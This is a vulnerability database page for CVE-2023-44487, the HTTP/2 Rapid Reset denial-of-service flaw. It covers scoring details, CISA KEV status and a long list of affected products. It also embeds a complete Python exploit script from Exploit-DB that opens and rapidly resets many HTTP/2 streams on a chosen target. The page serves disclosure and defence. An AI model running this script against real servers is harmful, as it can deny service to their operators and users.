CVE-2023-44487 : Detail

CVE-2023-44487

7.5
/
High
94.39%V4
Network
2023-10-10
00h00 +00:00
2025-10-21
23h05 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.
CWE-400 Uncontrolled Resource Consumption
The product does not properly control the allocation and maintenance of a limited resource.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : HTTP/2 Rapid Reset Attack Vulnerability

Required action : Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2023-10-09 22h00 +00:00

Action is due : 2023-10-30 23h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 52426

Publication date : 2025-09-15 22h00 +00:00
Author : Madhusudhan Rajappa
EDB Verified : No

#!/usr/bin/env python3 """ # Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS) # Google Dork: -NA- # Date: 29th August 2025 # Exploit Author: Madhusudhan Rajappa # Vendor Homepage: -NA- # Software Link: -NA- # Version: HTTP/2.0 # Tested on: -NA- # CVE : CVE-2023-44487 """ import asyncio import ssl import time import argparse import logging from typing import Optional, Tuple import statistics try: import h2.connection import h2.events import h2.exceptions import h2.config except ImportError: print("Error: h2 library not installed. Install with: pip install h2") exit(1) # Configure logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(__name__) class HTTP2RapidResetTester: """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability.""" def __init__(self, host: str, port: int = 443, use_ssl: bool = True): self.host = host self.port = port self.use_ssl = use_ssl self.connection = None self.reader = None self.writer = None self.response_times = [] self.errors = [] self.connection_closed = False async def connect(self) -> bool: """Establish HTTP/2 connection to the target server.""" try: logger.info(f"Connecting to {self.host}:{self.port}") if self.use_ssl: ssl_context = ssl.create_default_context() ssl_context.set_alpn_protocols(['h2']) self.reader, self.writer = await asyncio.open_connection( self.host, self.port, ssl=ssl_context ) else: self.reader, self.writer = await asyncio.open_connection(self.host, self.port) # Initialize HTTP/2 connection config = h2.config.H2Configuration(client_side=True) self.connection = h2.connection.H2Connection(config=config) self.connection.initiate_connection() # Send connection preface await self._send_data(self.connection.data_to_send()) logger.info("HTTP/2 connection established successfully") self.connection_closed = False return True except Exception as e: logger.error(f"Failed to establish connection: {e}") return False async def _send_data(self, data: bytes): """Send data to the server.""" if data and self.writer and not self.connection_closed: try: self.writer.write(data) await self.writer.drain() except (ConnectionResetError, BrokenPipeError, OSError) as e: logger.debug(f"Connection error while sending data: {e}") self.connection_closed = True async def _receive_data(self) -> bytes: """Receive data from the server.""" try: if self.connection_closed or not self.reader: return b'' data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0) if not data: self.connection_closed = True return data except asyncio.TimeoutError: return b'' except (ConnectionResetError, BrokenPipeError, OSError) as e: logger.debug(f"Connection error while receiving data: {e}") self.connection_closed = True return b'' async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict: """ Perform the rapid reset attack test. Args: num_streams: Number of streams to create and reset delay: Delay between stream creations (seconds) Returns: Dictionary with test results """ logger.info(f"Starting rapid reset test with {num_streams} streams") start_time = time.time() created_streams = [] reset_streams = [] try: # Phase 1: Rapidly create streams for i in range(num_streams): if self.connection_closed: logger.warning("Connection closed during stream creation") break stream_id = (i * 2) + 1 # Odd numbers for client-initiated streams # Create HTTP/2 headers headers = [ (':method', 'GET'), (':path', '/'), (':scheme', 'https' if self.use_ssl else 'http'), (':authority', self.host), ('user-agent', 'CVE-2023-44487-Tester/1.0'), ] try: # Send headers to create stream self.connection.send_headers(stream_id, headers) await self._send_data(self.connection.data_to_send()) created_streams.append(stream_id) # Small delay to avoid overwhelming the connection if delay > 0: await asyncio.sleep(delay) except Exception as e: self.errors.append(f"Error creating stream {stream_id}: {e}") if "connection" in str(e).lower(): break logger.info(f"Created {len(created_streams)} streams") # Phase 2: Rapidly reset all streams reset_start = time.time() for stream_id in created_streams: if self.connection_closed: logger.warning("Connection closed during stream reset") break try: # Send RST_STREAM frame to cancel the request self.connection.reset_stream(stream_id, error_code=0x8) # CANCEL error code await self._send_data(self.connection.data_to_send()) reset_streams.append(stream_id) if delay > 0: await asyncio.sleep(delay / 10) # Faster resets except h2.exceptions.StreamClosedError: # Stream already closed, continue pass except Exception as e: self.errors.append(f"Error resetting stream {stream_id}: {e}") if "connection" in str(e).lower(): break reset_duration = time.time() - reset_start total_duration = time.time() - start_time logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s") # Phase 3: Monitor server response await self._monitor_server_response(timeout=10.0) return { 'streams_created': len(created_streams), 'streams_reset': len(reset_streams), 'total_duration': total_duration, 'reset_duration': reset_duration, 'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0, 'errors': len(self.errors), 'response_times': self.response_times.copy(), 'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0, 'connection_closed': self.connection_closed } except Exception as e: logger.error(f"Error during rapid reset test: {e}") return {'error': str(e)} async def _monitor_server_response(self, timeout: float = 10.0): """Monitor server responses and measure response times.""" logger.info("Monitoring server responses...") end_time = time.time() + timeout while time.time() < end_time and not self.connection_closed: try: start = time.time() data = await self._receive_data() response_time = time.time() - start if data: self.response_times.append(response_time) try: # Process HTTP/2 events events = self.connection.receive_data(data) for event in events: if isinstance(event, h2.events.ResponseReceived): logger.debug(f"Response received on stream {event.stream_id}") elif isinstance(event, h2.events.StreamReset): logger.debug(f"Stream {event.stream_id} reset by server") elif isinstance(event, h2.events.ConnectionTerminated): logger.warning("Server terminated connection") self.connection_closed = True return except Exception as e: logger.debug(f"Error processing HTTP/2 events: {e}") await asyncio.sleep(0.1) except Exception as e: self.errors.append(f"Error monitoring response: {e}") break async def baseline_test(self, num_requests: int = 10) -> dict: """Perform baseline test with normal HTTP/2 requests.""" logger.info(f"Performing baseline test with {num_requests} normal requests") start_time = time.time() successful_requests = 0 for i in range(num_requests): if self.connection_closed: logger.warning("Connection closed during baseline test") break stream_id = (i * 2) + 1 headers = [ (':method', 'GET'), (':path', '/'), (':scheme', 'https' if self.use_ssl else 'http'), (':authority', self.host), ('user-agent', 'CVE-2023-44487-Baseline/1.0'), ] try: request_start = time.time() self.connection.send_headers(stream_id, headers) self.connection.end_stream(stream_id) await self._send_data(self.connection.data_to_send()) # Wait for response try: data = await asyncio.wait_for(self._receive_data(), timeout=5.0) if data: self.response_times.append(time.time() - request_start) successful_requests += 1 except asyncio.TimeoutError: logger.warning(f"Timeout waiting for response to request {i+1}") await asyncio.sleep(0.1) # Small delay between requests except Exception as e: logger.warning(f"Error in baseline request {i+1}: {e}") if "connection" in str(e).lower(): break total_duration = time.time() - start_time return { 'total_requests': num_requests, 'successful_requests': successful_requests, 'total_duration': total_duration, 'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0, 'success_rate': successful_requests / num_requests if num_requests > 0 else 0 } async def close(self): """Close the connection gracefully.""" if self.writer and not self.connection_closed: try: # Try to close the connection gracefully if self.connection: try: # Send GOAWAY frame if possible self.connection.close_connection() await self._send_data(self.connection.data_to_send()) except Exception as e: logger.debug(f"Error sending GOAWAY frame: {e}") # Close the writer self.writer.close() # Wait for close with timeout to avoid hanging try: await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0) except asyncio.TimeoutError: logger.debug("Timeout waiting for connection to close") except (ConnectionResetError, BrokenPipeError, OSError): # Connection already closed by peer, this is expected pass except Exception as e: logger.debug(f"Error during connection cleanup: {e}") finally: self.connection_closed = True async def main(): parser = argparse.ArgumentParser( description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester', epilog='WARNING: Only use on systems you own or have permission to test!' ) parser.add_argument('host', help='Target hostname') parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)') parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS') parser.add_argument('-s', '--streams', type=int, default=100, help='Number of streams for rapid reset test (default: 100)') parser.add_argument('-d', '--delay', type=float, default=0.001, help='Delay between stream operations (default: 0.001s)') parser.add_argument('--baseline-only', action='store_true', help='Only perform baseline test') parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output') args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) print("=" * 60) print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester") print("=" * 60) print(f"Target: {args.host}:{args.port}") print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}") print() # Legal disclaimer print("LEGAL DISCLAIMER:") print("This tool is for authorized security testing only.") print("Ensure you have permission to test the target system.") print("Unauthorized use may be illegal.") print() response = input("Do you have permission to test this system? (yes/no): ") if response.lower() != 'yes': print("Exiting. Only use this tool on systems you're authorized to test.") return tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl) try: # Connect to target if not await tester.connect(): logger.error("Failed to establish connection. Exiting.") return # Perform baseline test print("\n" + "="*40) print("BASELINE TEST") print("="*40) baseline_results = await tester.baseline_test() print(f"Baseline Results:") print(f" Total Requests: {baseline_results['total_requests']}") print(f" Successful: {baseline_results['successful_requests']}") print(f" Success Rate: {baseline_results['success_rate']:.2%}") print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s") print(f" Total Duration: {baseline_results['total_duration']:.3f}s") if not args.baseline_only: # Reset connection for rapid reset test await tester.close() tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl) if not await tester.connect(): logger.error("Failed to re-establish connection for rapid reset test.") return # Perform rapid reset test print("\n" + "="*40) print("RAPID RESET TEST (CVE-2023-44487)") print("="*40) print(f"Testing with {args.streams} streams...") rapid_results = await tester.rapid_reset_test(args.streams, args.delay) if 'error' in rapid_results: print(f"Test failed: {rapid_results['error']}") else: print(f"Rapid Reset Results:") print(f" Streams Created: {rapid_results['streams_created']}") print(f" Streams Reset: {rapid_results['streams_reset']}") print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second") print(f" Total Duration: {rapid_results['total_duration']:.3f}s") print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s") print(f" Errors: {rapid_results['errors']}") print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s") if rapid_results.get('connection_closed'): print(f" Connection Status: Server closed connection during test") # Analysis print("\n" + "="*40) print("VULNERABILITY ANALYSIS") print("="*40) if rapid_results.get('connection_closed'): print("Server closed connection during rapid reset test") print(" This could indicate protective measures or resource exhaustion.") if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8: print("WARNING: Server may have rejected many reset requests") print(" This could indicate protective measures are in place.") if rapid_results['reset_rate'] > 1000: print("HIGH RISK: Server accepts very high reset rates") print(" This may indicate vulnerability to CVE-2023-44487") elif rapid_results['reset_rate'] > 100: print("MEDIUM RISK: Server accepts moderate reset rates") print(" Further testing may be needed") else: print("LOWER RISK: Server has rate limiting on resets") print(" This suggests some protection against the vulnerability") if len(tester.errors) > rapid_results['streams_created'] * 0.1: print("Many errors occurred during testing") print(" Results may not be reliable") except KeyboardInterrupt: print("\nTest interrupted by user") except Exception as e: logger.error(f"Unexpected error: {e}") finally: try: await tester.close() except Exception as e: logger.debug(f"Error during final cleanup: {e}") print("\nTest completed.") if __name__ == "__main__": print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester") print("Requires: pip install h2") print() try: asyncio.run(main()) except KeyboardInterrupt: print("\nExiting...") except Exception as e: logger.error(f"Fatal error: {e}")

Products Mentioned

Configuraton 0

Ietf>>Http >> Version 2.0

Configuraton 0

Nghttp2>>Nghttp2 >> Version To (excluding) 1.57.0

Configuraton 0

Netty>>Netty >> Version To (excluding) 4.1.100

Configuraton 0

Envoyproxy>>Envoy >> Version 1.24.10

Envoyproxy>>Envoy >> Version 1.25.9

Envoyproxy>>Envoy >> Version 1.26.4

Envoyproxy>>Envoy >> Version 1.27.0

Configuraton 0

Eclipse>>Jetty >> Version To (excluding) 9.4.53

Eclipse>>Jetty >> Version From (including) 10.0.0 To (excluding) 10.0.17

Eclipse>>Jetty >> Version From (including) 11.0.0 To (excluding) 11.0.17

Eclipse>>Jetty >> Version From (including) 12.0.0 To (excluding) 12.0.2

Configuraton 0

Caddyserver>>Caddy >> Version To (excluding) 2.7.5

Configuraton 0

Golang>>Go >> Version To (excluding) 1.20.10

Golang>>Go >> Version From (including) 1.21.0 To (excluding) 1.21.3

Golang>>Http2 >> Version To (excluding) 0.17.0

Golang>>Networking >> Version To (excluding) 0.17.0

Configuraton 0

F5>>Big-ip_access_policy_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_access_policy_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_access_policy_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_access_policy_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_access_policy_manager >> Version 17.1.0

F5>>Big-ip_advanced_firewall_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_advanced_firewall_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_advanced_firewall_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_advanced_firewall_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_advanced_firewall_manager >> Version 17.1.0

F5>>Big-ip_advanced_web_application_firewall >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_advanced_web_application_firewall >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_advanced_web_application_firewall >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_advanced_web_application_firewall >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_advanced_web_application_firewall >> Version 17.1.0

F5>>Big-ip_analytics >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_analytics >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_analytics >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_analytics >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_analytics >> Version 17.1.0

F5>>Big-ip_application_acceleration_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_application_acceleration_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_application_acceleration_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_application_acceleration_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_application_acceleration_manager >> Version 17.1.0

F5>>Big-ip_application_security_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_application_security_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_application_security_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_application_security_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_application_security_manager >> Version 17.1.0

F5>>Big-ip_application_visibility_and_reporting >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_application_visibility_and_reporting >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_application_visibility_and_reporting >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_application_visibility_and_reporting >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_application_visibility_and_reporting >> Version 17.1.0

F5>>Big-ip_carrier-grade_nat >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_carrier-grade_nat >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_carrier-grade_nat >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_carrier-grade_nat >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_carrier-grade_nat >> Version 17.1.0

F5>>Big-ip_ddos_hybrid_defender >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_ddos_hybrid_defender >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_ddos_hybrid_defender >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_ddos_hybrid_defender >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_ddos_hybrid_defender >> Version 17.1.0

F5>>Big-ip_domain_name_system >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_domain_name_system >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_domain_name_system >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_domain_name_system >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_domain_name_system >> Version 17.1.0

F5>>Big-ip_fraud_protection_service >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_fraud_protection_service >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_fraud_protection_service >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_fraud_protection_service >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_fraud_protection_service >> Version 17.1.0

F5>>Big-ip_global_traffic_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_global_traffic_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_global_traffic_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_global_traffic_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_global_traffic_manager >> Version 17.1.0

F5>>Big-ip_link_controller >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_link_controller >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_link_controller >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_link_controller >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_link_controller >> Version 17.1.0

F5>>Big-ip_local_traffic_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_local_traffic_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_local_traffic_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_local_traffic_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_local_traffic_manager >> Version 17.1.0

F5>>Big-ip_next >> Version 20.0.1

F5>>Big-ip_next_service_proxy_for_kubernetes >> Version From (including) 1.5.0 To (including) 1.8.2

F5>>Big-ip_policy_enforcement_manager >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_policy_enforcement_manager >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_policy_enforcement_manager >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_policy_enforcement_manager >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_policy_enforcement_manager >> Version 17.1.0

F5>>Big-ip_ssl_orchestrator >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_ssl_orchestrator >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_ssl_orchestrator >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_ssl_orchestrator >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_ssl_orchestrator >> Version 17.1.0

F5>>Big-ip_webaccelerator >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_webaccelerator >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_webaccelerator >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_webaccelerator >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_webaccelerator >> Version 17.1.0

F5>>Big-ip_websafe >> Version From (including) 13.1.0 To (including) 13.1.5

F5>>Big-ip_websafe >> Version From (including) 14.1.0 To (including) 14.1.5

F5>>Big-ip_websafe >> Version From (including) 15.1.0 To (including) 15.1.10

F5>>Big-ip_websafe >> Version From (including) 16.1.0 To (including) 16.1.4

F5>>Big-ip_websafe >> Version 17.1.0

F5>>Nginx >> Version From (including) 1.9.5 To (including) 1.25.2

F5>>Nginx_ingress_controller >> Version From (including) 2.0.0 To (including) 2.4.2

F5>>Nginx_ingress_controller >> Version From (including) 3.0.0 To (including) 3.3.0

F5>>Nginx_plus >> Version From (including) r25 To (excluding) r29

F5>>Nginx_plus >> Version r29

F5>>Nginx_plus >> Version r30

Configuraton 0

Apache>>Tomcat >> Version From (including) 8.5.0 To (including) 8.5.93

Apache>>Tomcat >> Version From (including) 9.0.0 To (including) 9.0.80

Apache>>Tomcat >> Version From (including) 10.1.0 To (including) 10.1.13

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Apache>>Tomcat >> Version 11.0.0

Configuraton 0

Apple>>Swiftnio_http\/2 >> Version To (excluding) 1.28.0

Configuraton 0

Grpc>>Grpc >> Version To (excluding) 1.56.3

Grpc>>Grpc >> Version To (including) 1.59.2

Grpc>>Grpc >> Version From (including) 1.58.0 To (excluding) 1.58.3

Grpc>>Grpc >> Version 1.57.0

Configuraton 0

Microsoft>>.net >> Version From (including) 6.0.0 To (excluding) 6.0.23

Microsoft>>.net >> Version From (including) 7.0.0 To (excluding) 7.0.12

Microsoft>>Asp.net_core >> Version From (including) 6.0.0 To (excluding) 6.0.23

Microsoft>>Asp.net_core >> Version From (including) 7.0.0 To (excluding) 7.0.12

Microsoft>>Azure_kubernetes_service >> Version To (excluding) 2023-10-08

Microsoft>>Visual_studio_2022 >> Version From (including) 17.0 To (excluding) 17.2.20

Microsoft>>Visual_studio_2022 >> Version From (including) 17.4 To (excluding) 17.4.12

Microsoft>>Visual_studio_2022 >> Version From (including) 17.6 To (excluding) 17.6.8

Microsoft>>Visual_studio_2022 >> Version From (including) 17.7 To (excluding) 17.7.5

Microsoft>>Windows_10_1607 >> Version To (excluding) 10.0.14393.6351

Microsoft>>Windows_10_1607 >> Version To (excluding) 10.0.14393.6351

Microsoft>>Windows_10_1809 >> Version To (excluding) 10.0.17763.4974

Microsoft>>Windows_10_21h2 >> Version To (excluding) 10.0.19044.3570

Microsoft>>Windows_10_22h2 >> Version To (excluding) 10.0.19045.3570

Microsoft>>Windows_11_21h2 >> Version To (excluding) 10.0.22000.2538

Microsoft>>Windows_11_22h2 >> Version To (excluding) 10.0.22621.2428

Microsoft>>Windows_server_2016 >> Version -

Microsoft>>Windows_server_2019 >> Version -

Microsoft>>Windows_server_2022 >> Version -

Configuraton 0

Nodejs>>Node.js >> Version From (including) 18.0.0 To (excluding) 18.18.2

Nodejs>>Node.js >> Version From (including) 20.0.0 To (excluding) 20.8.1

Configuraton 0

Microsoft>>Cbl-mariner >> Version To (excluding) 2023-10-11

Configuraton 0

Dena>>H2o >> Version To (excluding) 2023-10-10

Configuraton 0

Facebook>>Proxygen >> Version To (excluding) 2023.10.16.00

Configuraton 0

Apache>>Apisix >> Version To (excluding) 3.6.1

Apache>>Traffic_server >> Version From (including) 8.0.0 To (excluding) 8.1.9

Apache>>Traffic_server >> Version From (including) 9.0.0 To (excluding) 9.2.3

Configuraton 0

Amazon>>Opensearch_data_prepper >> Version To (excluding) 2.5.0

Configuraton 0

Debian>>Debian_linux >> Version 10.0

Debian>>Debian_linux >> Version 11.0

Debian>>Debian_linux >> Version 12.0

Configuraton 0

Kazu-yamamoto>>Http2 >> Version To (excluding) 4.2.2

Configuraton 0

Istio>>Istio >> Version To (excluding) 1.17.6

Istio>>Istio >> Version From (including) 1.18.0 To (excluding) 1.18.3

Istio>>Istio >> Version From (including) 1.19.0 To (excluding) 1.19.1

Configuraton 0

Varnish_cache_project>>Varnish_cache >> Version To (excluding) 2023-10-10

Configuraton 0

Traefik>>Traefik >> Version To (excluding) 2.10.5

Traefik>>Traefik >> Version 3.0.0

Traefik>>Traefik >> Version 3.0.0

Traefik>>Traefik >> Version 3.0.0

Configuraton 0

Projectcontour>>Contour >> Version To (excluding) 2023-10-11

Configuraton 0

Linkerd>>Linkerd >> Version From (including) 2.12.0 To (including) 2.12.5

Linkerd>>Linkerd >> Version 2.13.0

Linkerd>>Linkerd >> Version 2.13.1

Linkerd>>Linkerd >> Version 2.14.0

Linkerd>>Linkerd >> Version 2.14.1

Configuraton 0

Linecorp>>Armeria >> Version To (excluding) 1.26.0

Configuraton 0

Redhat>>3scale_api_management_platform >> Version 2.0

Redhat>>Advanced_cluster_management_for_kubernetes >> Version 2.0

Redhat>>Advanced_cluster_security >> Version 3.0

Redhat>>Advanced_cluster_security >> Version 4.0

Redhat>>Ansible_automation_platform >> Version 2.0

Redhat>>Build_of_optaplanner >> Version 8.0

Redhat>>Build_of_quarkus >> Version -

Redhat>>Ceph_storage >> Version 5.0

Redhat>>Cert-manager_operator_for_red_hat_openshift >> Version -

Redhat>>Certification_for_red_hat_enterprise_linux >> Version 8.0

Redhat>>Certification_for_red_hat_enterprise_linux >> Version 9.0

Redhat>>Cost_management >> Version -

Redhat>>Cryostat >> Version 2.0

Redhat>>Decision_manager >> Version 7.0

Redhat>>Fence_agents_remediation_operator >> Version -

Redhat>>Integration_camel_for_spring_boot >> Version -

Redhat>>Integration_camel_k >> Version -

Redhat>>Integration_service_registry >> Version -

Redhat>>Jboss_a-mq >> Version 7

Redhat>>Jboss_a-mq_streams >> Version -

Redhat>>Jboss_core_services >> Version -

Redhat>>Jboss_data_grid >> Version 7.0.0

Redhat>>Jboss_enterprise_application_platform >> Version 6.0.0

Redhat>>Jboss_enterprise_application_platform >> Version 7.0.0

Redhat>>Jboss_fuse >> Version 6.0.0
